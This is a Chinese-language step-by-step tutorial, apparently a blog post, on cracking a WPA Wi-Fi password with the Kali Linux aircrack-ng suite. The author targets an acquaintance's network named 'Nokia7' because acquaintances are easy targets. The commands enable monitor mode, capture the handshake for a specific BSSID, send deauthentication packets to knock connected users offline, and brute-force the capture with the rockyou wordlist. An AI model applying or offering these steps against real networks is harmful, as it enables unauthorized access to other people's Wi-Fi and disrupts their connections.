硬件:Mac/windows电脑,具有monitor模式的无线网卡
软件:vmware fusion,kali镜像(iso文件即可)
以下均为干货,如有问题也可自行谷歌、百度。
劝君更尽一杯酒,我出阳关无故人。。。
1.搭建kali虚拟机,网上很多教程。
2.把你的无线网卡插进物理机,并配置给kali虚拟机 (就问你是不是干货?)
3.在shell里输入airmon-ng查看下网卡信息:
4.输入airmon-ng start wlan0开启网卡监听模式:
5.再次查看网卡信息,注意这里一定是mon结尾,否则是你的网卡无monitor模式:
6.命令行输入:airodump-ng wlan0mon (airodump-ng后接网卡名,去扫面周围wifi的信息,ctrl+c停止),扫出来如下图:
这里解释几个参数:
BSSID:MAC地址。
PWR:信号强度,越小信号越强。
#Data:传输的数据。
CH:信号频道,只有在一个频道才可进行下一步操作。
ESSID:wifi的名称,中文的可能会乱码。
7.抓包:在shell中输入airodump-ng -c 6 --bssidC6:F1:28:14:F1:F9 -w/home wlan0mon
这里我要破解的wifi是Nokia7(熟人比较好下手),所以频道和mac地址就要选择指定wifi的,另外home是指抓到报文后的报文名。
8.新建一个窗口 ,输入aireplay-ng -0 0 -a mac地址 网卡名 ,这一步是为了方便观察交互的过程,可以跳过。
9.当窗口右上角出现WPA handshake时说明抓包成功,我们还可以看到以获取的cap报文:
10.进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压:gzip -d rockyou.txt.gz
11.在shell中输入aircrack-ng -w /usr/share/wordlists/rockyou.txt home-01.cap,这个过程就是暴力破解了,成功后显示密码字符串:
12.愉快上网了,请叫我行走的wifi。但是这都是比较理想化的密码,暴力破解需要运气的成分,所以还是不要尝试破解反爆破的密码,毕竟太耗性能。另外,这种钓鱼wifi玩玩就可以了,不要触碰底线哦!
补充:1.获取包的前提首先是由用户连接此wifi 2.我们抓取的包是新用户连接此wifi的过程产生的流量,但是如果没有新用户怎么办?那么就让他断开重连。可是凭啥人家断开呢?所以这是需要我们主动发起攻击让其断开网络,这时候我们是一直抓包的,如果用户有知觉他会重连的,那么机会就来了。在第七步的抓包图片下半部分有一个station参数,那里显示的是连接此wifi的用户mac地址,记住其中一个并打开新的shell输入:aireplay-ng -0 2 -aC6:F1:28:14:F1:F9-c xx:xx:xx:xx:xx:xx wlan0mon,前边是wifi的mac地址,后边是被攻击者的mac地址。aireplay-ng的工具,它可以强制用户断开wifi连接;原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。当我们多次尝试攻击并成功后就会获取报文,也就是说当窗口右上角出现WPA handshake时说明抓包成功。于是我们就可以接着进行暴力破解了。
参数解释:
-0表示发起deauthentication攻击
-a指定无线路由器BSSID
-c指定强制断开的设备
请关注微信公众号:AI Engine